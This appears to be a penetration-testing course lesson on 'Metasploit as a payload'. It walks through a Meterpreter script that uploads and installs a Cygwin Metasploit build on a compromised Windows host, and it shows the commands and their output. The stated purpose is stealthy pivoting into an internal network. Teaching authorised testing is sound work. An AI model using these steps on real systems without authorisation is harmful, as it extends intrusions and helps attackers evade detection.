Metasploit as a Payload
Mubix from room362.com released a great ruby script for delivering Metasploit to an already compromised system that allows you to essentially run Metasploit from the victims machine and continue exploitation. There are many scenarios where this would be extremely beneficial, the most important one would be that you're doing a pentest and gain inside access with a Meterpreter console. From there you deliver Metasploit as a payload and continue exploitation on the internal network.
Why is this important?
Primarily for stealth as the more connections you have going out of the perimeter, the more chance you have of getting caught. With this payload, it allows you to have the connections originate and go to the first machine you compromised. This also helps if you lose a connection as you only have to have one machine set to call back which we will show you how to do later in the course.
First things first, you would need to download the ruby script and place it in the 'plugins' folder.
Download deploymsf.rb from here ./msf/deploymsf.rb
Next, you will need to download the Cygwin version of the Metasploit Framework. You have two options, the ENTIRE Metasploit Framework or just msfconsole. The pros and cons are large-sized payload delivery of 13megs if you do the full version and only 5 megs with just msfconsole.
Full Metasploit Cygwin: https://metasploit.com/framework-3.3-dev.exe
Only msfconsole: https://metasploit.com/mini-3.3-dev.exe
If you use the default path in the ruby script, you'll want to move the framework-3.3-dev.exe to /tmp/ on your linux machine or specify the "-d" option with the full directory of where you have put the Cygwin installer. Also, note that the default executable name is framework-3.3-dev.exe, if you're using the mini-3.3-dev.exe make sure you use the '-f' option and specify the filename.root@bt4:/pentest/exploits/framework3/plugins# wget http://www.room362.com/tools/deploymsf.rb
--2009-06-27 12:10:05-- http://www.room362.com/tools/deploymsf.rb
Resolving www.room362.com... 66.197.106.2
Connecting to www.room362.com|66.197.106.2|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4227 (4.1K) [text/plain]
Saving to: `deploymsf.rb'
100%[======================================>] 4,227 --.-K/s in 0.004s
2009-06-27 12:10:05 (1.07 MB/s) - `deploymsf.rb' saved [4227/4227]
We now have everything ready with our mini-3.3-dev.exe ready to go. Once we get a Meterpreter console, we have a few commands to issue so let's take a peek.meterpreter > run deploymsf -f mini-3.3-dev.exe -d /tmp/
[*] Running Meterpreter MSFp Deployment Script…..
[*] Uploading MSFp for for deployment….
[*] MSFp uploaded as C:DOCUME~1bt4LOCALS~1Temp19211.exe
[*] Installing MSFp………..
[*] Done!
[*] Installation Complete!
[*] Running cygwin shell channelized…
[*] Channel 19 created – Type: interact 19 to play
[*] Be warned, it takes a bit for post setup to happen
[*] and you will not see a prompt, try pwd to check
meterpreter > interact 19
Interacting with channel 19…
[*] Configuring multi-user permissions for first run…
[*] Configuring the initial user environment…
pwd
/home/bt4
ls
msfconsole
*** Metasploit only has EXPERIMENTAL support for Ruby 1.9.1 and newer, things may break!
*** Please report bugs to msfdev[at]metasploit.com
[-] ***
[-] * WARNING: No database support: LoadError no such file to load — active_record
[-] ***
| | _) |
__ `__ _ __| _` | __| __ | _ | __|
| | | __/ | ( |__ | | | ( | | |
_| _| _|___|__|__,_|____/ .__/ _|___/ _|__|
_|
=[ metasploit v3.3-rc1 [core:3.3 api:1.0]
+ — –=[ 379 exploits – 231 payloads
+ — –=[ 20 encoders – 7 nops
=[ 156 aux
msf >
We now have a fully interactive exploitation framework working on our victims machine and can further penetrate the network. Great stuff!